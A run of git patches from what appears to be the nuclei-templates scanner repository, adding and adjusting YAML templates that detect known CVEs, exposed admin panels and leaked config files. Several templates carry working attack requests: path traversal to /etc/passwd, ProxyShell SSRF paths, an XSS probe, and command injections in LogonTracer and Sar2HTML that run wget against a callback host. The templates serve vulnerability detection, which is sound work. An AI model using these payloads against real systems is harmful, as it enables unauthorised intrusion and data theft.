53 | file | 46 | | | | | +| tech | 100 | gaurang | 42 | workflows | 34 | | | | | From 40077029e8f3e456fe1375138752b101fa45db8d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 9 Aug 2021 19:49:35 +0000 Subject: [PATCH 1528/4083] Auto Update README [Mon Aug 9 19:49:35 UTC 2021] :robot: --- README.md | 24 ++++++++++++------------ 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/README.md b/README.md index 2401bea6cd..6995b4f020 100644 --- a/README.md +++ b/README.md @@ -40,18 +40,18 @@ An overview of the nuclei template project, including statistics on unique tags, ## Nuclei Templates Top 10 statistics -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|-----------|-------|---------------|-------|-----------|-------|----------|-------|---------|-------| -| cve | 576 | pikpikcu | 234 | Users | 1828 | info | 577 | http | 1696 | -| panel | 214 | dhiyaneshdk | 234 | | | high | 457 | file | 46 | -| xss | 213 | pdteam | 191 | | | medium | 385 | network | 35 | -| wordpress | 198 | daffainfo | 128 | | | critical | 218 | dns | 11 | -| exposure | 196 | dwisiswant0 | 127 | | | low | 156 | | | -| rce | 183 | geeknik | 127 | | | | | | | -| lfi | 168 | gy741 | 62 | | | | | | | -| cve2020 | 155 | madrobot | 60 | | | | | | | -| wp-plugin | 133 | princechaddha | 53 | | | | | | | -| tech | 100 | gaurang | 42 | | | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| +| cve | 576 | dhiyaneshdk | 234 | cves | 583 | info | 577 | http | 1696 | +| panel | 214 | pikpikcu | 234 | vulnerabilities | 262 | high | 457 | file | 46 | +| xss | 213 | pdteam | 191 | exposed-panels | 216 | medium | 385 | network | 35 | +| wordpress | 198 | daffainfo | 128 | exposures | 174 | critical | 218 | dns | 11 | +| exposure | 196 | geeknik | 127 | technologies | 158 | low | 156 | | | +| rce | 183 | dwisiswant0 | 127 | misconfiguration | 124 | | | | | +| lfi | 168 | gy741 | 62 | takeovers | 70 | | | | | +| cve2020 | 155 | madrobot | 60 | default-logins | 50 | | | | | +| wp-plugin | 133 | princechaddha | 53 | file | 46 | | | | | +| tech | 100 | gaurang | 42 | workflows | 34 | | | | | **143 directories, 1845 files**. From 8c1050256f78b30af84fcfc2ff46a13c65cf4d69 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Mon, 9 Aug 2021 17:35:43 -0400 Subject: [PATCH 1529/4083] Update CVE-2019-12616.yaml I don't know why the matcher was changed. The matcher phpmyadmin.net doesn't work in my test cases. --- cves/2019/CVE-2019-12616.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml index d3d88387c0..2459cca5ed 100644 --- a/cves/2019/CVE-2019-12616.yaml +++ b/cves/2019/CVE-2019-12616.yaml @@ -22,6 +22,7 @@ requests: - type: word words: - "phpmyadmin.net" + - "phpMyAdmin" - type: regex regex: @@ -30,4 +31,4 @@ requests: - type: status status: - 200 - - 401 + - 401 #password protected From ce351cf896eb888e609f8f7528bbd9b5c6c3ff5f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 10 Aug 2021 05:58:47 +0700 Subject: [PATCH 1530/4083] Create CVE-2010-1983.yaml --- cves/2010/CVE-2010-1983.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1983.yaml diff --git a/cves/2010/CVE-2010-1983.yaml b/cves/2010/CVE-2010-1983.yaml new file mode 100644 index 0000000000..c72666cc1b --- /dev/null +++ b/cves/2010/CVE-2010-1983.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1983 + +info: + name: Joomla! Component redTWITTER 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php + reference: | + - https://www.exploit-db.com/exploits/12055 + - https://www.cvedetails.com/cve/CVE-2010-1983 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From a17ffba4c54c51127588e8da45ed471b96ae5aae Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 10 Aug 2021 06:05:56 +0700 Subject: [PATCH 1531/4083] Create CVE-2014-4940.yaml --- cves/2014/CVE-2014-4940.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2014/CVE-2014-4940.yaml diff --git a/cves/2014/CVE-2014-4940.yaml b/cves/2014/CVE-2014-4940.yaml new file mode 100644 index 0000000000..123662c94a --- /dev/null +++ b/cves/2014/CVE-2014-4940.yaml @@ -0,0 +1,27 @@ +id: CVE-2014-4940 + +info: + name: WordPress Plugin Tera Charts - Directory Traversal + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. + reference: | + - https://www.exploit-db.com/exploits/45440 + - https://www.cvedetails.com/cve/CVE-2014-4940 + tags: cve,cve2014,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From f74f45cd9d10c2b5e2f9b9b47d89a3c3800d92f8 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 10 Aug 2021 06:13:01 +0700 Subject: [PATCH 1532/4083] Create CVE-2008-4764.yaml --- cves/2008/CVE-2008-4764.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2008/CVE-2008-4764.yaml diff --git a/cves/2008/CVE-2008-4764.yaml b/cves/2008/CVE-2008-4764.yaml new file mode 100644 index 0000000000..4435b80ee5 --- /dev/null +++ b/cves/2008/CVE-2008-4764.yaml @@ -0,0 +1,27 @@ +id: CVE-2008-4764 + +info: + name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action. + reference: | + - https://www.exploit-db.com/exploits/5435 + - https://www.cvedetails.com/cve/CVE-2008-4764 + tags: cve,cve2008,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From d6bd06a8782d26d8b55f5daffd68fe6b852b8279 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 9 Aug 2021 20:43:58 -0500 Subject: [PATCH 1533/4083] Update CVE-2020-24312.yaml Fixes a false positive. --- cves/2020/CVE-2020-24312.yaml | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-24312.yaml b/cves/2020/CVE-2020-24312.yaml index 81cc8aafe4..3b3c769b47 100644 --- a/cves/2020/CVE-2020-24312.yaml +++ b/cves/2020/CVE-2020-24312.yaml @@ -17,6 +17,7 @@ requests: - method: GET path: - '{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/' + matchers-condition: and matchers: - type: status @@ -25,4 +26,16 @@ requests: - type: word words: - - 'Index of' \ No newline at end of file + - 'Index of' + + - type: word + part: header + words: + - "text/html" + negative: true + + - type: word + part: body + words: + - "html>" + negative: true From 999a8febb91a8e63c7e8e3345678279ae7d37b51 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 10 Aug 2021 09:54:37 +0700 Subject: [PATCH 1534/4083] Update laravel-env.yaml --- exposures/configs/laravel-env.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposures/configs/laravel-env.yaml b/exposures/configs/laravel-env.yaml index 4c84cd3427..9c114adc54 100644 --- a/exposures/configs/laravel-env.yaml +++ b/exposures/configs/laravel-env.yaml @@ -25,6 +25,7 @@ requests: - "{{BaseURL}}/.env.old" - "{{BaseURL}}/.env_1" - "{{BaseURL}}/.env_sample" + - "{{BaseURL}}/api/.env" matchers-condition: and matchers: @@ -36,4 +37,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 2956610eab5912f35b26bc9377c76543145547e8 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 10 Aug 2021 10:02:17 +0700 Subject: [PATCH 1535/4083] Create iceflow-vpn-disclosure.yaml --- exposures/files/iceflow-vpn-disclosure.yaml | 32 +++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 exposures/files/iceflow-vpn-disclosure.yaml diff --git a/exposures/files/iceflow-vpn-disclosure.yaml b/exposures/files/iceflow-vpn-disclosure.yaml new file mode 100644 index 0000000000..e124e2ad81 --- /dev/null +++ b/exposures/files/iceflow-vpn-disclosure.yaml @@ -0,0 +1,32 @@ +id: iceflow-vpn-disclosure + +info: + name: ICEFlow VPN Disclosure + author: pikpikcu + severity: medium + tags: exposure,files + +requests: + - method: GET + path: + - "{{BaseURL}}/log/system.log" + - "{{BaseURL}}/log/vpn.log" + - "{{BaseURL}}/log/access.log" + - "{{BaseURL}}/log/warn.log" + - "{{BaseURL}}/log/error.log" + - "{{BaseURL}}/log/debug.log" + - "{{BaseURL}}/log/mobile.log" + - "{{BaseURL}}/log/firewall.log" + + matchers-condition: and + matchers: + - type: binary + binary: + - 'ICEFLOW VPN:' + - 'ICEFLOW SYSTEM' + - 'ICEFLOW' + part: body + + - type: status + status: + - 200 From 19517e88552d5fdc1e4ac714f06d63ae18c39daa Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Tue, 10 Aug 2021 14:24:54 +0900 Subject: [PATCH 1536/4083] Create CVE-2018-16167.yaml LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. Signed-off-by: GwanYeong Kim --- cves/2018/CVE-2018-16167.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2018/CVE-2018-16167.yaml diff --git a/cves/2018/CVE-2018-16167.yaml b/cves/2018/CVE-2018-16167.yaml new file mode 100644 index 0000000000..a14147df11 --- /dev/null +++ b/cves/2018/CVE-2018-16167.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-16167 + +info: + name: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated) + author: gy741 + severity: critical + description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. + reference: | + - https://www.exploit-db.com/exploits/49918 + - https://nvd.nist.gov/vuln/detail/CVE-2018-16167 + tags: cve,cve2018,logontracer,rce,oob + +requests: + - raw: + - | + POST /upload HTTP/1.1 + Host: {{Hostname}} + User-Agent: python-requests/2.18.4 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + + logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From ca3af4527d5254c8e0025bbb7f8652cf6c9b2b88 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 10 Aug 2021 14:31:05 +0700 Subject: [PATCH 1537/4083] Update iceflow-vpn-disclosure.yaml --- exposures/files/iceflow-vpn-disclosure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/iceflow-vpn-disclosure.yaml b/exposures/files/iceflow-vpn-disclosure.yaml index e124e2ad81..c4ecab5964 100644 --- a/exposures/files/iceflow-vpn-disclosure.yaml +++ b/exposures/files/iceflow-vpn-disclosure.yaml @@ -4,7 +4,7 @@ info: name: ICEFlow VPN Disclosure author: pikpikcu severity: medium - tags: exposure,files + tags: exposure,files,iceflow requests: - method: GET From 99d41391e72aa8c9b51c47edb60dfeb1f015aa55 Mon Sep 17 00:00:00 2001 From: Paul Werther Date: Tue, 10 Aug 2021 09:59:06 +0200 Subject: [PATCH 1538/4083] add ProxyShell detection template --- cves/2021/CVE-2021-34473.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2021/CVE-2021-34473.yaml diff --git a/cves/2021/CVE-2021-34473.yaml b/cves/2021/CVE-2021-34473.yaml new file mode 100644 index 0000000000..8f5ed21b88 --- /dev/null +++ b/cves/2021/CVE-2021-34473.yaml @@ -0,0 +1,23 @@ +id: CVE-2021-34473 + +info: + name: Exchange Server SSRF (ProxyShell) + author: arcc + severity: critical + description: | + Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206. + reference: | + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 + - https://www.youtube.com/watch?v=FC6iHw258RI + - https://portswigger.net/daily-swig/a-whole-new-attack-surface-researcher-orange-tsai-documents-proxylogon-exploits-against-microsoft-exchange-server + tags: cve,cve2021,ssrf,rce,exchange + +requests: + - method: GET + path: + - "{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" + + matchers: + - type: status + status: + - 302 \ No newline at end of file From ff558bd94edafedd7043ab42906c6035be3aa757 Mon Sep 17 00:00:00 2001 From: Paul Werther Date: Tue, 10 Aug 2021 10:17:37 +0200 Subject: [PATCH 1539/4083] add second url for more stable detection --- cves/2021/CVE-2021-34473.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-34473.yaml b/cves/2021/CVE-2021-34473.yaml index 8f5ed21b88..c7bc47bedc 100644 --- a/cves/2021/CVE-2021-34473.yaml +++ b/cves/2021/CVE-2021-34473.yaml @@ -15,7 +15,8 @@ info: requests: - method: GET path: - - "{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" + - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com' + - '{{BaseURL}}/mapi/nspi/?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com' matchers: - type: status From 36e43b66ec0e438afa56ec4638e7e06d2491b118 Mon Sep 17 00:00:00 2001 From: Paul Werther Date: Tue, 10 Aug 2021 10:53:58 +0200 Subject: [PATCH 1540/4083] follow redirect, compare body instead of status code, eliminate false positives --- cves/2021/CVE-2021-34473.yaml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-34473.yaml b/cves/2021/CVE-2021-34473.yaml index c7bc47bedc..d68b694bb0 100644 --- a/cves/2021/CVE-2021-34473.yaml +++ b/cves/2021/CVE-2021-34473.yaml @@ -14,11 +14,14 @@ info: requests: - method: GET + redirects: true path: - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com' - - '{{BaseURL}}/mapi/nspi/?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com' + - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com' matchers: - - type: status - status: - - 302 \ No newline at end of file + - type: word + part: body + words: + - Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException + - Exchange MAPI/HTTP Connectivity Endpoint \ No newline at end of file From 34f40f141c9aabb8ea5c95f69831f6c4793f3db0 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 10 Aug 2021 15:12:17 +0530 Subject: [PATCH 1541/4083] Added azkaban workflow --- workflows/azkaban-workflow.yaml | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 workflows/azkaban-workflow.yaml diff --git a/workflows/azkaban-workflow.yaml b/workflows/azkaban-workflow.yaml new file mode 100644 index 0000000000..ae922a4ec9 --- /dev/null +++ b/workflows/azkaban-workflow.yaml @@ -0,0 +1,13 @@ +id: azkaban-workflow + +info: + name: Azkaban Security Checks + author: pdteam + description: A simple workflow that runs all azkaban related nuclei templates on a given target. + tags: workflow + +workflows: + + - template: exposed-panels/azkaban-web-client.yaml + subtemplates: + - template: default-logins/azkaban/azkaban-web-client-defaulr-creds.yaml \ No newline at end of file From 63431349aaea30b5a908d2b32f8b42998538c235 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 10 Aug 2021 20:13:14 +0530 Subject: [PATCH 1542/4083] minor update --- cves/2020/CVE-2020-24312.yaml | 19 +++---------------- 1 file changed, 3 insertions(+), 16 deletions(-) diff --git a/cves/2020/CVE-2020-24312.yaml b/cves/2020/CVE-2020-24312.yaml index 3b3c769b47..deb2cb0cd8 100644 --- a/cves/2020/CVE-2020-24312.yaml +++ b/cves/2020/CVE-2020-24312.yaml @@ -9,10 +9,6 @@ info: reference: https://zeroaptitude.com/zerodetail/wordpress-plugin-bug-hunting-part-1/ tags: cve,cve2020,wordpress,backups - # NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-24312 - # Source: https://zeroaptitude.com/zerodetail/wordpress-plugin-bug-hunting-part-1/ - # Note: Manually check content - requests: - method: GET path: @@ -27,15 +23,6 @@ requests: - type: word words: - 'Index of' - - - type: word - part: header - words: - - "text/html" - negative: true - - - type: word - part: body - words: - - "html>" - negative: true + - 'wp-content/uploads/wp-file-manager-pro/fm_backup' + - 'backup_' + condition: and \ No newline at end of file From d84eb0fd7ed6c93a5c00d39e068f4adb10e95d2e Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 10 Aug 2021 22:21:46 +0530 Subject: [PATCH 1543/4083] Added CVE-2021-20090 --- cves/2021/CVE-2021-20090.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2021/CVE-2021-20090.yaml diff --git a/cves/2021/CVE-2021-20090.yaml b/cves/2021/CVE-2021-20090.yaml new file mode 100644 index 0000000000..19a576ad5c --- /dev/null +++ b/cves/2021/CVE-2021-20090.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-20090 + +info: + name: Buffalo WSR-2533DHPL2 - Path Traversal + author: gy741 + severity: critical + description: | + A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-20090 + - https://www.tenable.com/security/research/tra-2021-13 + - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 + tags: cve,cve2021,lfi,buffalo,firmware,iot + +requests: + - raw: + - | + GET /images/..%2finfo.html HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}}/images/info.html + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'URLToken(cgi_path)' + - 'pppoe' + - 'wan' + condition: and \ No newline at end of file From 74a17976a821235a14551df8da51dcf747b58303 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 10 Aug 2021 22:23:57 +0530 Subject: [PATCH 1544/4083] Update CVE-2021-20090.yaml --- cves/2021/CVE-2021-20090.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-20090.yaml b/cves/2021/CVE-2021-20090.yaml index 19a576ad5c..9a8b58fe37 100644 --- a/cves/2021/CVE-2021-20090.yaml +++ b/cves/2021/CVE-2021-20090.yaml @@ -6,7 +6,7 @@ info: severity: critical description: | A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication. - reference: + reference: | - https://nvd.nist.gov/vuln/detail/CVE-2021-20090 - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 From cd700031392ea57a73bcda7737ca2b925bbfde20 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 10 Aug 2021 22:55:56 +0530 Subject: [PATCH 1545/4083] Create wowza-streaming-engine.yaml --- exposed-panels/wowza-streaming-engine.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/wowza-streaming-engine.yaml diff --git a/exposed-panels/wowza-streaming-engine.yaml b/exposed-panels/wowza-streaming-engine.yaml new file mode 100644 index 0000000000..20093618e0 --- /dev/null +++ b/exposed-panels/wowza-streaming-engine.yaml @@ -0,0 +1,22 @@ +id: wowza-streaming-engine + +info: + name: Wowza Streaming Engine + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Manager%22+product%3A%22Wowza+Streaming+Engine%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/enginemanager/ftu/welcome.htm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Wowza Streaming Engine Manager' + - type: status + status: + - 200 From 873500375b83baeb56c30ca8f1662dd8c00f4067 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 10 Aug 2021 22:58:49 +0530 Subject: [PATCH 1546/4083] Create server-backup-manager-se.yaml --- exposed-panels/server-backup-manager-se.yaml | 22 ++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/server-backup-manager-se.yaml diff --git a/exposed-panels/server-backup-manager-se.yaml b/exposed-panels/server-backup-manager-se.yaml new file mode 100644 index 0000000000..94694b6aee --- /dev/null +++ b/exposed-panels/server-backup-manager-se.yaml @@ -0,0 +1,22 @@ +id: server-backup-manager-se + +info: + name: Server Backup Manager SE + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Server+Backup+Manager+SE%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/login.zul' + + matchers-condition: and + matchers: + - type: word + words: + - 'Server Backup Manager SE ' + - type: status + status: + - 200 From 2a02daee4883ccbf6af2c2fedf4314cb4c519192 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 10 Aug 2021 23:01:40 +0530 Subject: [PATCH 1547/4083] Create nginx-proxy-manager.yaml --- exposed-panels/nginx-proxy-manager.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/nginx-proxy-manager.yaml diff --git a/exposed-panels/nginx-proxy-manager.yaml b/exposed-panels/nginx-proxy-manager.yaml new file mode 100644 index 0000000000..f06fe457af --- /dev/null +++ b/exposed-panels/nginx-proxy-manager.yaml @@ -0,0 +1,22 @@ +id: nginx-proxy-manager + +info: + name: Nginx Proxy Manager + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Nginx+Proxy+Manager%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/login' + + matchers-condition: and + matchers: + - type: word + words: + - 'Nginx Proxy Manager' + - type: status + status: + - 200 From 473d5821db826e914f303651b09f4246f0c9a41f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 10 Aug 2021 23:03:42 +0530 Subject: [PATCH 1548/4083] Create hp-service-manager.yaml --- exposed-panels/hp-service-manager.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/hp-service-manager.yaml diff --git a/exposed-panels/hp-service-manager.yaml b/exposed-panels/hp-service-manager.yaml new file mode 100644 index 0000000000..5aa822c516 --- /dev/null +++ b/exposed-panels/hp-service-manager.yaml @@ -0,0 +1,22 @@ +id: hp-service-manager + +info: + name: HP Service Manager + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22HP+Service+Manager%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/sm935/index.do' + + matchers-condition: and + matchers: + - type: word + words: + - 'HP Service Manager: Login' + - type: status + status: + - 200 From 5a1abf37008a5736b96bd771213af9a669087b92 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 10 Aug 2021 23:05:47 +0530 Subject: [PATCH 1549/4083] Create mongodb-ops-manager.yaml --- exposed-panels/mongodb-ops-manager.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/mongodb-ops-manager.yaml diff --git a/exposed-panels/mongodb-ops-manager.yaml b/exposed-panels/mongodb-ops-manager.yaml new file mode 100644 index 0000000000..404f4afde8 --- /dev/null +++ b/exposed-panels/mongodb-ops-manager.yaml @@ -0,0 +1,22 @@ +id: mongodb-ops-manager + +info: + name: MongoDB Ops Manager + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22MongoDB+Ops+Manager%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/account/login' + + matchers-condition: and + matchers: + - type: word + words: + - 'MongoDB Ops Manager' + - type: status + status: + - 200 From 0d2b53e71d384d346b4181964a54c8bc0854f835 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Wed, 11 Aug 2021 13:58:08 +0900 Subject: [PATCH 1550/4083] Create sar2html-rce.yaml SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a commend injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. Signed-off-by: GwanYeong Kim --- vulnerabilities/other/sar2html-rce.yaml | 28 +++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/other/sar2html-rce.yaml diff --git a/vulnerabilities/other/sar2html-rce.yaml b/vulnerabilities/other/sar2html-rce.yaml new file mode 100644 index 0000000000..37b6624dc7 --- /dev/null +++ b/vulnerabilities/other/sar2html-rce.yaml @@ -0,0 +1,28 @@ +id: sar2html-rce + +info: + name: Sar2HTML - Remote Code Execution + author: gy741 + severity: critical + description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a commend injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. + reference: | + - https://www.exploit-db.com/exploits/49344 + tags: sar2html,mirai,rce,oob + +requests: + - raw: + - | + GET /index.php?plot=;wget http://{{interactsh-url}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: python-requests/2.18.4 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + + unsafe: true + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 74719fb87b822c6bf4fc26f46e3ba8bb4fc0897f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 11 Aug 2021 12:38:45 +0700 Subject: [PATCH 1551/4083] Create CVE-2016-1000139.yaml --- cves/2016/CVE-2016-1000139.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2016/CVE-2016-1000139.yaml diff --git a/cves/2016/CVE-2016-1000139.yaml b/cves/2016/CVE-2016-1000139.yaml new file mode 100644 index 0000000000..f7af9ea73a --- /dev/null +++ b/cves/2016/CVE-2016-1000139.yaml @@ -0,0 +1,31 @@ +id: CVE-2016-1000139 + +info: + name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000139 + tags: cve,cve2016,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - '"><"' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From f088bae396b2f7c7afcfd11fe3fa1f66e0d8bc2a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 12:58:48 +0530 Subject: [PATCH 1552/4083] Update CVE-2016-1000146.yaml --- cves/2016/CVE-2016-1000146.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000146.yaml b/cves/2016/CVE-2016-1000146.yaml index aa06e3a5bf..b45691d8da 100644 --- a/cves/2016/CVE-2016-1000146.yaml +++ b/cves/2016/CVE-2016-1000146.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + - 